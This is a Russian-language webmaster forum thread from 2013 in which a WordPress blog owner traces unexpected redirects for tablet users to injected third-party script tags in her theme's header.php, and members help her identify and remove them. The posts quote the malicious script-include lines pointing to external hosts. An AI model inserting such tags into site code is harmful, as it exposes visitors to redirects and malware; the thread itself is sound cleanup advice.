Перейти к содержимому

Фотография

Незапланированный редирект со страницы сайта на вордпрессе


  • Авторизуйтесь для ответа в теме
Сообщений в теме: 42

#1 Катя (Aki Astarta)

Катя (Aki Astarta)

    Студентка-практикантка

  • Клиент Info-DVD.Ru
  • PipPipPipPipPip
  • 1 462 сообщений
2 392
Очень хороший
  • Страна, Город:
    Центральный Мордор
  • Пол:Женщина

Отправлено 25 Июнь 2013 - 11:25

Доброго дня всем. Помогите, пожалуйста, разобраться с вопросом. 

Есть блог на вордпрессе.

Зарегистрированный пользователь пожаловался, что со страницы, где происходит вход на сайт .wp-login.php идет автоматическое ниоткуда взявшееся (я не настраивала :( ) перенаправление на другие сайты, например, на страницу http://turbomobibit....5f0a5314564f0b, в конечном итоге человека выбрасывает на поисковую страницу гугла :blink: :wacko: то есть человек не может попасть в раздел для зарегистрированных пользователей, хотя раньше таких проблем не возникало, ни у него, ни вообще. 

 

У меня все работает как надо.

 

Что это может быть, как и где его искать и как с ним бороться?

 


  • 0

Помощь учителям Луганска                                                                                                       

 


На правах рекламы

#2 Андрей Бер

Андрей Бер

    Коммерсант

  • Киберсанты
  • PipPipPipPip
  • 165 сообщений
55
Очень хороший
  • Страна, Город:
    Иркутск
  • Пол:Мужчина

Отправлено 25 Июнь 2013 - 12:31

Проверьте на нескольких компьютерах, скорее всего проблема у человека (вирус)
  • 1

Бесплатный плагин создания страниц захвата WPLead - Интеграция с JustClick, SmartResponder и UniSender из коробки.


#3 Катя (Aki Astarta)

Катя (Aki Astarta)

    Студентка-практикантка

  • Клиент Info-DVD.Ru
  • PipPipPipPipPip
  • 1 462 сообщений
2 392
Очень хороший
  • Страна, Город:
    Центральный Мордор
  • Пол:Женщина

Отправлено 25 Июнь 2013 - 12:40

Андрей, спасибо.

То есть нужно проверить с нескольких разных компьютеров и если все будет ок, то посылать пользователя....проверяться и лечиться?)) 


  • 0

Помощь учителям Луганска                                                                                                       

 


#4 Андрей Бер

Андрей Бер

    Коммерсант

  • Киберсанты
  • PipPipPipPip
  • 165 сообщений
55
Очень хороший
  • Страна, Город:
    Иркутск
  • Пол:Мужчина

Отправлено 25 Июнь 2013 - 12:47

Именно так, а свой урл можно проверить хотя бы тут https://www.virustotal.com/ru/#url
  • 1

Бесплатный плагин создания страниц захвата WPLead - Интеграция с JustClick, SmartResponder и UniSender из коробки.


#5 Vladis

Vladis

    Коммерсант

  • Киберсанты
  • PipPipPipPip
  • 110 сообщений
11
Хороший
  • Страна, Город:
    Челябинск
  • Пол:Мужчина

Отправлено 25 Июнь 2013 - 12:48

например, на страницу http://turbomobibit....5f0a5314564f0b,

Страница зараженная, касперыч на нее не пускает. Если у Вас с сайтом все в порядке, то проблемы точно у пользователя.


  • 1

#6 Катя (Aki Astarta)

Катя (Aki Astarta)

    Студентка-практикантка

  • Клиент Info-DVD.Ru
  • PipPipPipPipPip
  • 1 462 сообщений
2 392
Очень хороший
  • Страна, Город:
    Центральный Мордор
  • Пол:Женщина

Отправлено 25 Июнь 2013 - 12:59

свой урл можно проверить хотя бы тут https://www.virustotal.com/ru/#url

Какой хороший инструмент, Андрей, спасибо. Даже не знала, что такое существует :blush:

Показатель выявления 0 / 39 (зелененький)

По преобладающему большинству сканеров ссылок результат clean site, кое-где Unrated site

То есть вроде как со страницей все нормально?

 

А вот в графе "Проверка файла" он (инструмент :)) написал
 

Проверка файла: Не удалось загрузить содержимое по указанной ссылке, либо оно (содержимое) представляет собой разновидность текстового формата (HTML, XML, CST, TXT и т. п.), и в связи с этим данная ссылка не была поставлена в очередь на антивирусную проверку.

Не могу понять, он провел проверку или нет? :blush:

 

Страница зараженная, касперыч на нее не пускает. Если у Вас с сайтом все в порядке, то проблемы точно у пользователя.

Vladis, спасибо.


  • 0

Помощь учителям Луганска                                                                                                       

 


#7 Андрей Бер

Андрей Бер

    Коммерсант

  • Киберсанты
  • PipPipPipPip
  • 165 сообщений
55
Очень хороший
  • Страна, Город:
    Иркутск
  • Пол:Мужчина

Отправлено 25 Июнь 2013 - 13:04

Значит проблема у клиента. Проверка файла туда нужно подозрительный файл с компа загружать, это к теме не относиться.
  • 1

Бесплатный плагин создания страниц захвата WPLead - Интеграция с JustClick, SmartResponder и UniSender из коробки.


#8 Катя (Aki Astarta)

Катя (Aki Astarta)

    Студентка-практикантка

  • Клиент Info-DVD.Ru
  • PipPipPipPipPip
  • 1 462 сообщений
2 392
Очень хороший
  • Страна, Город:
    Центральный Мордор
  • Пол:Женщина

Отправлено 25 Июнь 2013 - 13:20

Значит проблема у клиента. Проверка файла туда нужно подозрительный файл с компа загружать, это к теме не относиться.

Андрей, поняла. Тройное вам спасибо.

На независимом компьютере все тоже хорошо. Значит, на сайте все путем.

 

А есть какой-то независимый онлайн сервис, где можно клиентский компьютер проверить?


  • 0

Помощь учителям Луганска                                                                                                       

 


#9 Андрей Бер

Андрей Бер

    Коммерсант

  • Киберсанты
  • PipPipPipPip
  • 165 сообщений
55
Очень хороший
  • Страна, Город:
    Иркутск
  • Пол:Мужчина

Отправлено 25 Июнь 2013 - 14:16

Увы нет, пусть поставит avast, он бесплатен и крут.
  • 0

Бесплатный плагин создания страниц захвата WPLead - Интеграция с JustClick, SmartResponder и UniSender из коробки.


#10 Катя (Aki Astarta)

Катя (Aki Astarta)

    Студентка-практикантка

  • Клиент Info-DVD.Ru
  • PipPipPipPipPip
  • 1 462 сообщений
2 392
Очень хороший
  • Страна, Город:
    Центральный Мордор
  • Пол:Женщина

Отправлено 25 Июнь 2013 - 16:25

Увы нет, пусть поставит avast, он бесплатен и крут.

А на айпадах его можно ставить? (отвечать не обязательно, просто у пользователя именно он).


  • 0

Помощь учителям Луганска                                                                                                       

 


#11 Андрей Бер

Андрей Бер

    Коммерсант

  • Киберсанты
  • PipPipPipPip
  • 165 сообщений
55
Очень хороший
  • Страна, Город:
    Иркутск
  • Пол:Мужчина

Отправлено 25 Июнь 2013 - 16:32

Не знаю ) не имею айпэда, но на маке ставил.
  • 1

Бесплатный плагин создания страниц захвата WPLead - Интеграция с JustClick, SmartResponder и UniSender из коробки.


#12 Сергей (ex-Gudvin)

Сергей (ex-Gudvin)

    Ученик

  • Киберсанты
  • PipPipPipPipPip
  • 5 785 сообщений
2 710
Очень хороший
  • Пол:Мужчина

Отправлено 25 Июнь 2013 - 18:34

Есть блог на вордпрессе.

Зарегистрированный пользователь пожаловался, что со страницы, где происходит вход на сайт .wp-login.php

 

Странный редирект, только с определённой страницы сайта... Киньте ссылочку на блог, Astarta... Можно в личку...


  • 1

Кто счастлив, тот и прав. (Л. Н. Толстой)


#13 Катя (Aki Astarta)

Катя (Aki Astarta)

    Студентка-практикантка

  • Клиент Info-DVD.Ru
  • PipPipPipPipPip
  • 1 462 сообщений
2 392
Очень хороший
  • Страна, Город:
    Центральный Мордор
  • Пол:Женщина

Отправлено 25 Июнь 2013 - 19:51

Странный редирект, только с определённой страницы сайта... Киньте ссылочку на блог, Astarta... Можно в личку.

Да, про остальные страницы я как-то и не подумала :blush: Вопрос-то ключевой был про доступ к платному разделу,вот меня и сузило:))...

Еще были жалобы на то, что с поиска на сайт попасть не может: нажимает ссылку перехода на сайт, и снова попадает на поиск (опять редирект?).

Но на другом компьютере проблема у клиента исчезла: никаких редиректов, никаких проблем со входом. Значит, проблема все-таки в компе, а не в сайте.

Спасибо, Сергей. Ссылка в личке.


  • 0

Помощь учителям Луганска                                                                                                       

 


#14 Сергей (ex-Gudvin)

Сергей (ex-Gudvin)

    Ученик

  • Киберсанты
  • PipPipPipPipPip
  • 5 785 сообщений
2 710
Очень хороший
  • Пол:Мужчина

Отправлено 26 Июнь 2013 - 08:44

Еще были жалобы на то, что с поиска на сайт попасть не может: нажимает ссылку перехода на сайт, и снова попадает на поиск (опять редирект?).

 

Один из сторонних скриптов, который подгружается на страницы сайта, в рандомном режиме подгружает различные фреймы:

 

Image.png

 

Обращение к некоторым фреймам приводит к редиректу на Яндекс. Возможно, в этом рандоме появляется, порой, и фрейм с указанным выше редиректом... Что это за скрипт? От какого-то плагина? Как часто у клиента возникает проблема со входом на сайт?


  • 1

Кто счастлив, тот и прав. (Л. Н. Толстой)


#15 Катя (Aki Astarta)

Катя (Aki Astarta)

    Студентка-практикантка

  • Клиент Info-DVD.Ru
  • PipPipPipPipPip
  • 1 462 сообщений
2 392
Очень хороший
  • Страна, Город:
    Центральный Мордор
  • Пол:Женщина

Отправлено 26 Июнь 2013 - 09:03

Сергей (ex-Gudvin)

приводит к редиректу на Яндекс

Клиент работает с гугла.

 

Как часто у клиента возникает проблема со входом на сайт?

Несколько недель проблем не было: вход в закрытый раздел с этой страницы проходил без приключений. Жалоба пришла пару дней назад. Проблема существует только на планшете - с него так и не удалось зайти; а с другого компьютера, как я уже писала, вход получился без проблем и редиректов. 

 

 

Возможно, в этом рандоме и появляется, порой, фрейм с указанным редиректом... Что это за скрипт?

Сергей, спасибо, что разбираетесь в моем вопросе. Но... из меня, мягко говоря, очень слабый технарь :blush:  Что такое редирект и скрипт я, конечно, знаю, но рандомы и фреймы :blink: :wacko: :blink:  Это сильнее меня:)
Первая ссылка с программным кодом, который автоматически подгружается на страницу моего сайта?

А вторая открывается как пустая страница :blush:


  • 0

Помощь учителям Луганска                                                                                                       

 


#16 Катя (Aki Astarta)

Катя (Aki Astarta)

    Студентка-практикантка

  • Клиент Info-DVD.Ru
  • PipPipPipPipPip
  • 1 462 сообщений
2 392
Очень хороший
  • Страна, Город:
    Центральный Мордор
  • Пол:Женщина

Отправлено 26 Июнь 2013 - 09:27

Увидела картинку в вашем сообщении, Сергей :blush:

Сайт psy-ufa.ru (с него чего-то ко мне подгружается?) мне не известен и даже не открывается, чтобы посмотреть, что он и откуда. И второй ibfcconsortium.com тоже пустышка  - не знаю его и он тоже не открывается.

А как определить, что именно ко мне подгружается и избавиться от него, если это не нужное мне барахло? Может, это в какой-то плагин, установленный на моем сайте, добрый автор "вшил" такую ерунду?


  • 0

Помощь учителям Луганска                                                                                                       

 


#17 Сергей (ex-Gudvin)

Сергей (ex-Gudvin)

    Ученик

  • Киберсанты
  • PipPipPipPipPip
  • 5 785 сообщений
2 710
Очень хороший
  • Пол:Мужчина

Отправлено 26 Июнь 2013 - 10:33

Проблема существует только на планшете

 

Я сам не программер, но возможно данный (или другой) скрипт как раз и индетифицирует мобильные устройства (смартфоны, планшеты и т.д.) и только для них делает возможным редирект с подгружаемых фреймов.

 

Господа программеры, подскажите пожалуйста, что делает данный скрипт?

 

но рандомы и фреймы :blink: :wacko: :blink: Это сильнее меня :)

 

random - случайный... Говоря "рандом", я имею ввиду случайную ротацию элементов (в данном случае фреймов).

iframe - html-тег... Говоря "фрейм", я имею ввиду тег "iframe", который присутствует на скриншоте выше и через который на страницы сайта можно подгружать с другого сайта как отдельно взятый элемент (изображение, скрипт и т.д.), так и страницы полностью.

 

Первая ссылка с программным кодом, который автоматически подгружается на страницу моего сайта?

 

Да. Что-то (плагин или независимо прописанный код) вставляет в страницы Вашего сайта указанный выше скрипт. Этот скрипт создаёт фреймы (iframe), через которые в случайном (а может и в упорядоченном) порядке на страницы Вашего сайта подгружаются страницы с других сайтов.

 

А вторая открывается как пустая страница :blush:

 

У меня она не пустая, а перенаправляет на http://ya.ru/ Некоторые ссылки, которые формирует скрипт, ведут на пустые (или не работающие) страницы, а некоторые перекидывают на ya.ru.

 

Если указанную выше страницу со скриптом обновлять через определённый промежуток времени (минут через 10, примерно), то там (в конце скрипта) будут появляться разные адреса, из которых и формируются различные фреймы на страницах Вашего сайта. Не думаю, что это что-то нормальное и нужное..

 

Сайт psy-ufa.ru (с него чего-то ко мне подгружается?) мне не известен и даже не открывается, чтобы посмотреть, что он и откуда. И второй ibfcconsortium.com тоже пустышка - не знаю его и он тоже не открывается.

 

Сами сайты пустые, но скрипты с них подгружаются...

 

А как определить, что именно ко мне подгружается

 

Сам скрипт можно посмотреть по ссылке выше. Содержание фреймов, как писал выше, либо отправляет на пустую страницу стороннего сайта, либо на ya.ru... Я работаю с ноутбука, с мобильных устройств (сартфоны, планшеты и т.д), возможно, оправляет на другие адреса.

 

и избавиться от него, если это не нужное мне барахло? Может, это в какой-то плагин, установленный на моем сайте, добрый автор "вшил" такую ерунду?

 

Если установлены какие нибудь "левые" плагины, то может быть... Но начните с простого, с места (файла) куда прописывали код Яндекс.Метрики, посмотрите, нет ли там данного кода:

<script src="http://psy-ufa.ru/wp-includes/images/wlw/1/404.php" type="text/javascript"></script>

  • 1

Кто счастлив, тот и прав. (Л. Н. Толстой)


#18 Катя (Aki Astarta)

Катя (Aki Astarta)

    Студентка-практикантка

  • Клиент Info-DVD.Ru
  • PipPipPipPipPip
  • 1 462 сообщений
2 392
Очень хороший
  • Страна, Город:
    Центральный Мордор
  • Пол:Женщина

Отправлено 26 Июнь 2013 - 11:50

Но начните с простого, с места (файла) куда прописывали код Яндекс.Метрики, посмотрите, нет ли там данного кода:

Нашла! В шаблонах темы сайта код метрики у меня в подвале, а этот - в header.php

<script type="text/javascript" src="http://psy-ufa.ru/wp-includes/images/wlw/1/404.php"></script>

 и рядышком же еще один похожий дружочек, неизвестный мне доселе

<script language="JavaScript" src="http://www.insightcrime.org/media/system/js/jquery-1.6.5.min.js" type="text/javascript"></script>

А второго сайта, который ibfcconsortium.com, не вижу.

 

Значит, эти штуки прописаны в шаблонах темы (почему бы и нет, если тема бесплатная). Теперь удалять эти строчки? Или сначала разобраться, для чего они нужны и бекап сделать? :biggrin:


  • 0

Помощь учителям Луганска                                                                                                       

 


#19 Сергей (ex-Gudvin)

Сергей (ex-Gudvin)

    Ученик

  • Киберсанты
  • PipPipPipPipPip
  • 5 785 сообщений
2 710
Очень хороший
  • Пол:Мужчина

Отправлено 26 Июнь 2013 - 12:33

Нашла! В шаблонах темы сайта код метрики у меня в подвале, а этот - в header.php
<script type="text/javascript" src="http://psy-ufa.ru/wp-includes/images/wlw/1/404.php"></script>

 

Удаляйте.

 

и рядышком же еще один похожий дружочек, неизвестный мне доселе
<script language="JavaScript" src="http://www.insightcrime.org/media/system/js/jquery-1.6.5.min.js" type="text/javascript"></script>

 

Удаляйте. У меня на данную ссылку вообще браузеры выдают предупреждение:

 

Image1.jpg

 

Image4.jpg

 

А второго сайта, который ibfcconsortium.com, не вижу.

 

Эта ссылка из ротации фреймов, которые создаёт скрипт psy-ufa.ru/wp-includes/images/wlw/1/404.php. Удалив код, который вставляет скрипт в страницу, т.е.:

<script type="text/javascript" src="http://psy-ufa.ru/wp-includes/images/wlw/1/404.php"></script>

...Вы, соответственно, ликвидируете создание фреймов, через которые подгружаются различные страницы с других сайтов, в том числе и вышеуказанная.

 

Значит, эти штуки прописаны в шаблонах темы (почему бы и нет, если тема бесплатная).

 

Да, для бесплатных шаблонов это обычное явление. Проверить шаблоны на наличие внешних ссылок и вредоносного кода хорошо помогает плагин ТАС для Wordpress.

 

Теперь удалять эти строчки? Или сначала разобраться, для чего они нужны и бекап сделать? :biggrin:

 

Как написал выше, можете смело удалять данные строчки.

 

После удаления вредоносного кода, попросите клиента вновь попробовать войти с планшета... В идеале, перед входом на сайт, клиенту желательно почистить кеш своего браузера, т.к. вредоносные скрипты могли сохраниться в кеше.


  • 1

Кто счастлив, тот и прав. (Л. Н. Толстой)


#20 Катя (Aki Astarta)

Катя (Aki Astarta)

    Студентка-практикантка

  • Клиент Info-DVD.Ru
  • PipPipPipPipPip
  • 1 462 сообщений
2 392
Очень хороший
  • Страна, Город:
    Центральный Мордор
  • Пол:Женщина

Отправлено 26 Июнь 2013 - 13:53

Сергей, спасибо вам большое за помощь. Вечером буду "чистить" сайт.


  • 0

Помощь учителям Луганска                                                                                                       

 





Количество пользователей, читающих эту тему: 1

0 пользователей, 1 гостей, 0 скрытых пользователей